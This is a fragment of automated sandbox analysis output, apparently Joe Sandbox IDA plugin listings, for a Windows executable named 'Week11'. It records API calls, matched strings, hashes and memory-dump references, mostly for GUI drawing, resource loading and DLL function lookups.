                                • Opcode ID: df7aa3096c852ff0e68b98ebeccaf79c573fd760911f2fa3b6c2d8ae2d99ee80
                                • Instruction ID: e3f0f0436f10e7231e6be9fae70369ccf633b2d8a1b7ff7d54ee89e77877cb73
                                • Opcode Fuzzy Hash: df7aa3096c852ff0e68b98ebeccaf79c573fd760911f2fa3b6c2d8ae2d99ee80
                                • Instruction Fuzzy Hash: 78513E71E01119EFCB04DFA5D880AEEBBB8FF48714F10815AE910AB240DB35AD15CBA4
                                APIs
                                • IsWindowVisible.USER32(00000000), ref: 0043416B
                                • GetMessagePos.USER32 ref: 0043417A
                                • ScreenToClient.USER32(00000000,?), ref: 00434198
                                • CopyRect.USER32(?,?), ref: 004341C3
                                • SetFocus.USER32(00000000,?,?), ref: 004341DF
                                • PostMessageW.USER32(00000000,00000787,00000000,00000000), ref: 00434212
                                • SendMessageW.USER32(00000000,00000200,00000001,00000000), ref: 00434221
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Message$ClientCopyFocusPostRectScreenSendVisibleWindow
                                • String ID:
                                • API String ID: 2748411872-0
                                • Opcode ID: 279e5d58f11e983977a9a209ef140a337322d0b1437d670832ec6569d8cc7733
                                • Instruction ID: b2dacfc8fa355c76718d6420920e3f16cb606e0aee05ae2445eece695ce4b699
                                • Opcode Fuzzy Hash: 279e5d58f11e983977a9a209ef140a337322d0b1437d670832ec6569d8cc7733
                                • Instruction Fuzzy Hash: CD414F71600205AFEB14DF55CC84FAB77A8EF99350F10865AF915AB390DB34ED01CB64
                                APIs
                                • _memset.LIBCMT ref: 004AA56C
                                • SHGetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,?,?,?,?,00000400), ref: 004AA595
                                • _memset.LIBCMT ref: 004AA642
                                • lstrcmpiA.KERNEL32(?,?), ref: 004AA66A
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _memset$Valuelstrcmpi
                                • String ID: Software\360Safe\Liveup$mid
                                • API String ID: 999496690-2395435937
                                • Opcode ID: c99ca5e81b02d1620d9dc4415e0673db51d686a5c0c6622f0e281984eff48d7a
                                • Instruction ID: b492119fd73ce0d9529ffcaaf72970bcda56fcff49eeb761907619a045a37326
                                • Opcode Fuzzy Hash: c99ca5e81b02d1620d9dc4415e0673db51d686a5c0c6622f0e281984eff48d7a
                                • Instruction Fuzzy Hash: 884117315043459FD735DB24C841BFB77D8AFA6708F08492EE58A87281EB34991DCB5B
                                APIs
                                • CallWindowProcW.USER32(?,00000001,?,?,?), ref: 0046C4D6
                                • GetWindowLongW.USER32(00000001,000000FC), ref: 0046C4E7
                                • CallWindowProcW.USER32(?,00000001,00000082,?,?), ref: 0046C4FF
                                • GetWindowLongW.USER32(00000001,000000FC), ref: 0046C519
                                • SetWindowLongW.USER32(00000001,000000FC,?), ref: 0046C52E
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$Long$CallProc
                                • String ID: $
                                • API String ID: 513923721-3993045852
                                • Opcode ID: 804adb479330d2158328d58e8ec34ddf2a6ad6c4fffd224ca4cc7b18ecfb6e8b
                                • Instruction ID: 829c855f8e88a4c409aa734e283a464b9be5b60d3a12ba7bd4f9b40a6a5a15f1
                                • Opcode Fuzzy Hash: 804adb479330d2158328d58e8ec34ddf2a6ad6c4fffd224ca4cc7b18ecfb6e8b
                                • Instruction Fuzzy Hash: A741FAB5600614AFCB24CF59D8849ABB7F8FB88710B108A1EF99AD7750D734E941CFA4
                                APIs
                                • _memset.LIBCMT ref: 004865A1
                                • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 004865CA
                                • GetWindowLongW.USER32(?,000000FC), ref: 004865DC
                                • GetWindowLongW.USER32(?,000000FC), ref: 004865ED
                                • SetWindowLongW.USER32(?,000000FC,?), ref: 00486609
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: LongWindow$MessageSend_memset
                                • String ID: ,
                                • API String ID: 2997958587-3772416878
                                • Opcode ID: 9b1428e27582b108472f702563873b26a1a01680aeb2374d7e618b7780049f84
                                • Instruction ID: fcf382016dc8bdb5a7b8c00e16659be162168b8252942fa143cdf4702e046031
                                • Opcode Fuzzy Hash: 9b1428e27582b108472f702563873b26a1a01680aeb2374d7e618b7780049f84
                                • Instruction Fuzzy Hash: D431C370600611AFCB20BF79D888A6EB7E5BF48314F160A3EE54597791DB38E800CB58
                                APIs
                                • GetModuleHandleW.KERNEL32(sites.dll), ref: 0042A533
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: GetFileDataFromStorage$GetFileLengthFromStorage$sites.dll
                                • API String ID: 4139908857-1979421132
                                • Opcode ID: 205c3618236d13193b8898fb90c854bb3bf55a54a3c46c2efd1e888821f4b97f
                                • Instruction ID: 1fa310f7eff1b83844a300552924f15398ef1374e5edf1b91b641dc429db63ca
                                • Opcode Fuzzy Hash: 205c3618236d13193b8898fb90c854bb3bf55a54a3c46c2efd1e888821f4b97f
                                • Instruction Fuzzy Hash: BF01D6323403267BDB115AB9AC80ABB73DC9FC5725750402BFD0CC7202EA38D85582A9
                                APIs
                                • LoadLibraryW.KERNEL32(Kernel32.dll,?,?,0046707B,1D1D1D8C,?,?), ref: 0047E792
                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0047E7AB
                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0047E7BA
                                Strings
                                • Wow64RevertWow64FsRedirection, xrefs: 0047E7B4
                                • Kernel32.dll, xrefs: 0047E781
                                • Wow64DisableWow64FsRedirection, xrefs: 0047E7A5
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
                                • API String ID: 2238633743-1575494070
                                • Opcode ID: be671781c8c432fcebdbfcb8745fcd3c82e020e70c8d0e22d2799a6f5ff895f8
                                • Instruction ID: 4ecdc83dd5505c3cbb38689492599f8d91eda5e768caebdcd881cf47f59fc17b
                                • Opcode Fuzzy Hash: be671781c8c432fcebdbfcb8745fcd3c82e020e70c8d0e22d2799a6f5ff895f8
                                • Instruction Fuzzy Hash: 2E0125B56003899FC724DFA6ECC0966F7E8EB59701331456FE459C7721C7356880CB58
                                APIs
                                • LoadLibraryW.KERNEL32(Kernel32.dll,004C0CB4,0046D5DF), ref: 0047E84C
                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0047E864
                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0047E873
                                Strings
                                • Wow64RevertWow64FsRedirection, xrefs: 0047E86D
                                • Kernel32.dll, xrefs: 0047E83B
                                • Wow64DisableWow64FsRedirection, xrefs: 0047E85E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
                                • API String ID: 2238633743-1575494070
                                • Opcode ID: e501e02ad7344acbb4263cb58b87f254c23cca5508dab8845d0b4c2e2ecfd66a
                                • Instruction ID: a01be648aa922b1640926440c58b6a2f55d0dbd03a48ea489f8060510f167247
                                • Opcode Fuzzy Hash: e501e02ad7344acbb4263cb58b87f254c23cca5508dab8845d0b4c2e2ecfd66a
                                • Instruction Fuzzy Hash: 9CF0DAB09003419BC7619F6AEC84A55F7E8EBE5B01322556FE4A5C7231D7745481CB58
                                APIs
                                • GetModuleHandleW.KERNEL32(sites.dll,?,00480587,00480B8B,1D1D1D8C,004276DB,?,?,000000FF), ref: 004803B6
                                • GetProcAddress.KERNEL32(00000000,GetFileLengthFromStorage), ref: 004803CF
                                • GetProcAddress.KERNEL32(00000000,GetFileDataFromStorage), ref: 004803DC
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: GetFileDataFromStorage$GetFileLengthFromStorage$sites.dll
                                • API String ID: 667068680-1979421132
                                • Opcode ID: ba44ad3ebad217459ec54b6af6064ea26d7671eb7bb5d99ab269c39b9de9ea0a
                                • Instruction ID: 76776a9aca3c09fab9a284d6ac2efe263d43b6458e039b26a7ef354f785f9032
                                • Opcode Fuzzy Hash: ba44ad3ebad217459ec54b6af6064ea26d7671eb7bb5d99ab269c39b9de9ea0a
                                • Instruction Fuzzy Hash: BAE092315617119BD6D0AB387C04F8F3698DB90B90F06013BEC0096252D779C941879C
                                APIs
                                • GdipCreateFromHDC.GDIPLUS(?,?,?,1D1D1D8C), ref: 00428415
                                • CopyRect.USER32(?,?), ref: 00428449
                                • GdipSetClipRectI.GDIPLUS(?,?,?,?,?,00000000,?,1D1D1D8C), ref: 00428490
                                • GdipResetClip.GDIPLUS(?,?,?,00000000,00000000,00000000), ref: 00428545
                                • GdipDeleteBrush.GDIPLUS(?,?,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 00428617
                                • GdipDeleteGraphics.GDIPLUS(?,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 00428620
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$ClipDeleteRect$BrushCopyCreateFromGraphicsReset
                                • String ID:
                                • API String ID: 2296537269-0
                                • Opcode ID: 651bc4e712e5d57672b930c250f3e00eca8197ad4fceaa9a22bbc3aa95670b54
                                • Instruction ID: 9f69f649c0531c7d01d09b5a7e39bf7e1676fda4b2c47b955fa986feb152432a
                                • Opcode Fuzzy Hash: 651bc4e712e5d57672b930c250f3e00eca8197ad4fceaa9a22bbc3aa95670b54
                                • Instruction Fuzzy Hash: B6A14AB1A0121AEFDF14DF94D884AEEBBB5FF48314F54811EE905A7240DB38AD51CBA4
                                APIs
                                • DeleteFileW.KERNEL32(?,?,00000401,?,00000401), ref: 00430D25
                                • PostMessageW.USER32(?,00000401,00000000,00000000), ref: 00430E38
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DeleteFileMessagePost
                                • String ID: %p|%s|%u$T9N$disable_resize
                                • API String ID: 3800956871-1662393167
                                • Opcode ID: 1e32038507ba1feec5d02d36489da2690e7d91bd0bd9fe5c43df5f6d7e5b5a3e
                                • Instruction ID: b9b9ea4d7a6a2712e875ddc8091bfa44c6a79144ca5a17814dea005c11a588e5
                                • Opcode Fuzzy Hash: 1e32038507ba1feec5d02d36489da2690e7d91bd0bd9fe5c43df5f6d7e5b5a3e
                                • Instruction Fuzzy Hash: 42F189756043009FC714DF19C881A5BB7E5EF89324F148A5EF9999B352C738ED02CBAA
                                APIs
                                • CharNextW.USER32(?,00000000,00000000,?,?,?,00446A6D), ref: 004460DF
                                • CharNextW.USER32(00000000,?,00000000,00000000,?,?,?,00446A6D), ref: 004460F7
                                • CharNextW.USER32(00000000,?,00000000,00000000,?,?,?,00446A6D), ref: 00446110
                                • CharNextW.USER32(75A3A7D0,?,00000000,00000000,?,?,?,00446A6D), ref: 00446117
                                • CharNextW.USER32(00000000,?,00000000,00000000,?,?,?,00446A6D), ref: 00446171
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CharNext
                                • String ID:
                                • API String ID: 3213498283-0
                                • Opcode ID: a0189b3108c05be30ba86b9b69e67bae54b5a3f49c9514b0386e1d8119a55a9c
                                • Instruction ID: 37e5b94376f02e1ba7737fbb8c4a9f0002ba02506704fd020d02e49866831bab
                                • Opcode Fuzzy Hash: a0189b3108c05be30ba86b9b69e67bae54b5a3f49c9514b0386e1d8119a55a9c
                                • Instruction Fuzzy Hash: 4041EF312002128BE7249F38DC85577B3E5FF6A311BA5096ED889C3356EB39D881C79A
                                APIs
                                • LoadLibraryExW.KERNEL32 ref: 00446BDD
                                • FindResourceW.KERNEL32(00000000,?,?), ref: 00446BF8
                                • FreeLibrary.KERNEL32(00000000,?), ref: 00446CBD
                                  • Part of subcall function 00445320: GetLastError.KERNEL32(00443597), ref: 00445320
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Library$ErrorFindFreeLastLoadResource
                                • String ID:
                                • API String ID: 3418355812-0
                                • Opcode ID: 593e083c582287b0ec04c063ec813ce276290018c5cf64e7f4304d24288eadea
                                • Instruction ID: 52af52765b7018bd23f2b760989501530ca8233637e5d450e92807a3d993dcc8
                                • Opcode Fuzzy Hash: 593e083c582287b0ec04c063ec813ce276290018c5cf64e7f4304d24288eadea
                                • Instruction Fuzzy Hash: 4C41B1711087019BE324DF15D881A6BB7E8FB89758F41062FF88993251DB38DD05CAAF
                                APIs
                                • GdipGetImageWidth.GDIPLUS(448904C4,0042ECF2,00000000,?,?,?,0042ECF2,?), ref: 0042EA74
                                • GdipGetImageHeight.GDIPLUS(448904C4,?,448904C4,0042ECF2,00000000,?,?,?,0042ECF2,?), ref: 0042EA8B
                                • GdipAlloc.GDIPLUS(00000010,?,448904C4,?,448904C4,0042ECF2,00000000,?,?,?,0042ECF2,?), ref: 0042EA9A
                                • GdipCreateBitmapFromScan0.GDIPLUS(0042ECF2,?,00000000,0026200A,00000000,?,00000010,?,448904C4,?,448904C4,0042ECF2,00000000,?,?,?), ref: 0042EAC1
                                • GdipBitmapGetPixel.GDIPLUS(448904C4,00000000,00000000,?,0042ECF2,?,00000000,0026200A,00000000,?,00000010,?,448904C4,?,448904C4,0042ECF2), ref: 0042EAF4
                                • GdipBitmapSetPixel.GDIPLUS(?,00000000,00000000,FF000000,448904C4,00000000,00000000,?,0042ECF2,?,00000000,0026200A,00000000,?,00000010,?), ref: 0042EB3D
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Bitmap$ImagePixel$AllocCreateFromHeightScan0Width
                                • String ID:
                                • API String ID: 589066873-0
                                • Opcode ID: e733b6b687a4c5f3fea4d2c4b0e17155b2e366daab84b252ef7d41c16ad21c0b
                                • Instruction ID: 06c8f380e6a1397b3655f2985a67f7226a17fe18fdcafde15b48169c2821b68d
                                • Opcode Fuzzy Hash: e733b6b687a4c5f3fea4d2c4b0e17155b2e366daab84b252ef7d41c16ad21c0b
                                • Instruction Fuzzy Hash: AD31B371B00129AF9B10DF5AD881DAFBBB8FB85714B14819FF8099B205D234AD42CBA4
                                APIs
                                • GdipCreatePen1.GDIPLUS(?,?,00000000,00000000), ref: 00424ACC
                                • GdipSetPenDashOffset.GDIPLUS(00000000,?,?,?,00000000,00000000), ref: 00424AEE
                                • GdipSetPenDashStyle.GDIPLUS(00000000,00000001,00000000,?,?,?,00000000,00000000), ref: 00424B00
                                • GdipSetPenWidth.GDIPLUS(00000000,-00000001,?,?,00000000,00000000), ref: 00424B3C
                                • GdipDrawEllipseI.GDIPLUS(?,00000000,?,?,?,00000000,00000000,-00000001,?,?,00000000,00000000), ref: 00424B5D
                                • GdipDeletePen.GDIPLUS(00000000,?,00000000,?,?,?,00000000,00000000,-00000001,?,?,00000000,00000000), ref: 00424B6D
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Dash$CreateDeleteDrawEllipseOffsetPen1StyleWidth
                                • String ID:
                                • API String ID: 3835754423-0
                                • Opcode ID: bc5f782dc8e549d5fd057ac300281a0aebe9ca155e616210d25f95e4f6b985ba
                                • Instruction ID: 884cc54257c44e265a942f82c6f7be33afd1a3d1f8ecdfb0b82d9b1b9e82e48f
                                • Opcode Fuzzy Hash: bc5f782dc8e549d5fd057ac300281a0aebe9ca155e616210d25f95e4f6b985ba
                                • Instruction Fuzzy Hash: B8318675A04118AFDF18DFA9D884AAEBBB8EF84350F15815EF904E7240D738DD40CB64
                                APIs
                                • _memset.LIBCMT ref: 0043E1B6
                                • _memset.LIBCMT ref: 0043E1C9
